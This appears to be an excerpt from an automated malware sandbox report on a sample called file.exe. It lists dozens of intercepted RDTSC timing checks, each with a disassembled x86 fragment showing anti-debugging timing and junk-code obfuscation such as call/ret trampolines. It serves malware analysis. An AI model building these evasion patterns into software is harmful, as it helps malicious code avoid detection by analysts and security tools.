                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34118 second address: D341AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F6999135DE8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, eax 0x00000027 jbe 00007F6999135DEFh 0x0000002d pushad 0x0000002e mov ebx, eax 0x00000030 add bx, 847Bh 0x00000035 popad 0x00000036 push dword ptr fs:[00000000h] 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F6999135DE8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 jns 00007F6999135DECh 0x0000005d sub dword ptr [ebp+122D33FAh], edx 0x00000063 mov dword ptr fs:[00000000h], esp 0x0000006a add ebx, 6CA65DD5h 0x00000070 mov eax, dword ptr [ebp+122D0BE1h] 0x00000076 push FFFFFFFFh 0x00000078 mov bl, ah 0x0000007a nop 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e jbe 00007F6999135DE6h 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34F24 second address: D34FA0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F699913D2FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F699913D2F8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jne 00007F699913D2FEh 0x0000002b push 00000000h 0x0000002d mov edi, esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F699913D2F8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b jc 00007F699913D2F6h 0x00000051 sub dword ptr [ebp+122D2610h], ecx 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34FA0 second address: D34FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34FA5 second address: D34FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3518F second address: D35193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36117 second address: D3611C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3611C second address: D36141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6999135DFBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36141 second address: D36147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37D93 second address: D37E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F6999135DE8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1BEAh], edx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F6999135DE8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 sub di, B806h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007F6999135DE8h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 add dword ptr [ebp+122D1F47h], edx 0x0000006b xchg eax, esi 0x0000006c pushad 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36147 second address: D3614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36FB3 second address: D36FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37E13 second address: D37E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38E27 second address: D38E48 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6999135DF3h 0x00000008 jmp 00007F6999135DEDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jbe 00007F6999135DECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39E1B second address: D39E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F699913D2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38E48 second address: D38E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3AE6F second address: D3AE8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39E25 second address: D39E38 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6999135DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39E38 second address: D39E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39E3C second address: D39E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F626 second address: D3F62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D1D0 second address: D3D1D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F62F second address: D3F633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F6CD second address: D3F6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F6D1 second address: D3F6D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F6D5 second address: D3F6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D40617 second address: D4061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F8CC second address: D3F8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4270D second address: D42711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48A09 second address: D48A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48CC1 second address: D48CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D306h 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48CDF second address: D48CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E2AD second address: D4E2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E4D2 second address: D4E4ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E4ED second address: D4E4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E4F1 second address: D4E4FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E4FB second address: D4E530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F699913D304h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E530 second address: D4E54A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jc 00007F6999135DE6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D532A4 second address: D532B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D532B0 second address: D532D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6999135DEAh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6999135DF5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51F17 second address: D51F3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F699913D307h 0x0000000c jc 00007F699913D2F6h 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51F3C second address: D51F6D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6999135E00h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jo 00007F6999135DE6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51F6D second address: D51F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D306h 0x00000009 popad 0x0000000a jmp 00007F699913D2FBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D525BB second address: D525C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52750 second address: D52762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FDh 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52895 second address: D528C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6999135DEAh 0x0000000b pop edi 0x0000000c pushad 0x0000000d ja 00007F6999135DF3h 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F6999135DEBh 0x0000001a push esi 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop esi 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52B51 second address: D52B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FBh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52B66 second address: D52B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D548F6 second address: D5490D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F699913D2FFh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58F97 second address: D58F9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C301 second address: D2C351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+12445B9Fh], ebx 0x0000000d lea eax, dword ptr [ebp+1247E00Dh] 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F699913D2F8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dx, si 0x00000030 nop 0x00000031 push edx 0x00000032 jnp 00007F699913D2FCh 0x00000038 jo 00007F699913D2F6h 0x0000003e pop edx 0x0000003f push eax 0x00000040 pushad 0x00000041 js 00007F699913D2FCh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C996 second address: D2C99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C99F second address: D2C9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C9A3 second address: D2C9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6999135DF2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C9C0 second address: D2C9C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2CD3C second address: D2CD76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 sub dword ptr [ebp+122D2379h], esi 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F6999135DE8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2CD76 second address: D2CD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2CD7A second address: D2CD8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2CD8F second address: D2CD95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D4B2 second address: D2D4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D5CC second address: D0BF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 call dword ptr [ebp+122D1F4Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F699913D303h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58042 second address: D58046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58046 second address: D5804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5804C second address: D58056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58056 second address: D5805A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5805A second address: D58092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6999135DF2h 0x0000000b popad 0x0000000c pushad 0x0000000d jc 00007F6999135DF2h 0x00000013 jne 00007F6999135DE6h 0x00000019 jl 00007F6999135DE6h 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push edx 0x00000023 pop edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5835D second address: D58369 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F699913D2F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58369 second address: D5836E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58620 second address: D58624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5878F second address: D587A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007F6999135DE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D587A4 second address: D587BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jnp 00007F699913D2F6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58A8F second address: D58AC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F6999135DE6h 0x0000000d jmp 00007F6999135DF9h 0x00000012 jns 00007F6999135DE6h 0x00000018 popad 0x00000019 pushad 0x0000001a jp 00007F6999135DE6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58AC5 second address: D58ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58ACB second address: D58AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6999135DE6h 0x0000000a popad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6999135DEFh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58AEB second address: D58AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F582 second address: D5F588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F588 second address: D5F592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F592 second address: D5F596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DFB7 second address: D5DFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E558 second address: D5E585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f jg 00007F6999135DEEh 0x00000015 push esi 0x00000016 pop esi 0x00000017 ja 00007F6999135DE6h 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 jp 00007F6999135DE6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E585 second address: D5E589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E6E1 second address: D5E6EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E6EB second address: D5E6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E6EF second address: D5E718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEDh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6999135DF3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EC0C second address: D5EC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
